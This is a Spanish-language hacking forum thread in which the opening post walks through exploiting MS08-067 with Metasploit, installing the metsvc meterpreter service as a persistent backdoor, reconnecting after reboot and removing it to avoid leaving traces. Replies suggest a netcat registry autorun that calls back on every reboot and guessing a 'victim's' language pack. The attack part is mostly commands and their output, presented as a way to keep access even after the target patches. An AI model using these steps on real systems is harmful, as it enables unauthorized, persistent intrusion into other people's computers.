elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [Metasploit] Crear un Backdoor con meterpreter
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Metasploit] Crear un Backdoor con meterpreter  (Leído 12,593 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
[Metasploit] Crear un Backdoor con meterpreter
« en: 6 Enero 2010, 04:03 am »

[Metasploit] Crear un Backdoor con meterpreter


Primero, necesitamos una sesión de meterpreter en el sistema remoto.

Código:
                                  _             
                                 | |      o     
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  | 
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|                   
                           \|                   


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 489 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8074 updated today (2010.01.05)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.83.1
LHOST => 172.16.83.1
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 3 opened (172.16.83.1:54745 -> 172.16.83.128:4444)

meterpreter >

Una vez conseguida, ejecutamos metsrv, que instalará como servicio un servidor de meterpreter en el host remoto.

Código:
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\HdOFwlxzpobWuh...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
 * Starting service
Service metsvc successfully installed.

Ahora, si queremos, podemos reiniciar el sistema remoto, aunque el servicio ya está corriendo.

Código:
meterpreter > reboot
Rebooting...
meterpreter >

Ahora, cuando se reinicie el host remoto, vamos a conectarnos al servicio de meterpreter que acabamos de instalar.

Para ello, usaremos el handler para que nos porte el exploit windows/metsvc_bind_tcp, lo configuraremos y nos conectaremos, como haré yo.

Código:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 1 opened (172.16.83.1:42050 -> 172.16.83.128:31337)

meterpreter >

Y ya está! Esto nos viene bien por si el host remoto aplica un parche que corrija sus vulnerabilidades.
Aunque parchee el sistema, nosotros tendremos acceso a su sistema a través de ese backdoor.

Y si queremos desinstar el metsvc en el host remoto para no dejar rastro, tan sólo tenemos que ejecutar metsvc -r en nuestra sesión de meterpreter.

Código:
meterpreter > run metsvc -r
[*] Removing the existing Meterpreter service
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\QQqawIYOjLq...
[*]  >> Uploading metsvc.exe...
[*] Stopping the service...
* Stopping service metsvc
 * Removing service
Service metsvc successfully removed.

meterpreter >

Y quedará metsvc completamente desinstalado sin perder la sesión que estamos utilizando (Por si cambiamos de idea xD)

Un saludo.

Fuente: Not Spam http://foro.portalhacker.net/index.php/topic,100609.0.html
En línea

Te vendería mi talento por poder dormir tranquilo.
Masita

Desconectado Desconectado

Mensajes: 120


pythoneando


Ver Perfil
Re: [Metasploit] Crear un Backdoor con meterpreter
« Respuesta #1 en: 6 Enero 2010, 05:01 am »

Lo que yo me estaba preguntando es ¿hay un metsvc con conexion inversa?  Lo buscaria yo mismo en el Metasploit pero ahora no puedo abrirlo.
En línea

En el cielo estan suspendidas las palabras que cantamos en nuestros sueños....
kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: [Metasploit] Crear un Backdoor con meterpreter
« Respuesta #2 en: 6 Enero 2010, 12:57 pm »

no se si habrá con conexión inversa, supongo que si, pero en caso contrario, puedes hacer todo un poco más "artesanal", y ser tú el que cree la entrada en el registro apuntando a un ejecutable, por ejemplo el netcat, para que cada vez que se reinicie el pc se conecte a donde quieras...

este método está explicado en https://foro.elhacker.net/hacking_basico/mini_howto_usando_meterpreter-t275163.0.html , sólo tienes que amoldarlo para que se comporte como te dije

salu2
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Masita

Desconectado Desconectado

Mensajes: 120


pythoneando


Ver Perfil
Re: [Metasploit] Crear un Backdoor con meterpreter
« Respuesta #3 en: 6 Enero 2010, 16:01 pm »

Gracias por la respuesta Kamsky, comentaba metsvc, por que me devolviese una sesion de Meterpreter en lugar de un CMD.exe, y asi usar las funcionalidades extra que aporta. Si no siempre quedan los metodos tradicionales de nuestra querida navaja suiza.  :P
En línea

En el cielo estan suspendidas las palabras que cantamos en nuestros sueños....
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: [Metasploit] Crear un Backdoor con meterpreter
« Respuesta #4 en: 7 Enero 2010, 10:20 am »

Buff no me explota por no sqber que lenguaje usa...
Código:
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.

En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: [Metasploit] Crear un Backdoor con meterpreter
« Respuesta #5 en: 7 Enero 2010, 13:08 pm »

http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: [Metasploit] Crear un Backdoor con meterpreter
« Respuesta #6 en: 7 Enero 2010, 20:27 pm »

Y como se el idioma que es?

Saludos
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: [Metasploit] Crear un Backdoor con meterpreter
« Respuesta #7 en: 7 Enero 2010, 23:15 pm »

pues hombre, una forma es "imaginártelo", es decir, sabes de que pais es la víctima?? pues sabiendo eso prueba el idioma natal, y si no es ese pues en el 99% de los casos será inglés o variantes
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Cargar Meterpreter en Metasploit, sin tener Session
Hacking
Jupiter34 5 5,072 Último mensaje 24 Marzo 2013, 10:07 am
por m0rf
BackDoor Meterpreter Reverse TCP (DUDA)
Hacking
ZuriaHack 1 2,975 Último mensaje 16 Enero 2014, 17:17 pm
por Rentero
Duda con funcion portfwd de Meterpreter en Metasploit !!
Hacking
TrashAmbishion 0 2,092 Último mensaje 18 Febrero 2015, 20:11 pm
por TrashAmbishion
backdoor con meterpreter
Hacking
d0r127 3 5,186 Último mensaje 9 Diciembre 2016, 00:13 am
por Gödric
metasploit errorThis version of Meterpreter is not supported with this Script!
Dudas Generales
neph 0 2,650 Último mensaje 23 Enero 2017, 16:14 pm
por neph
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines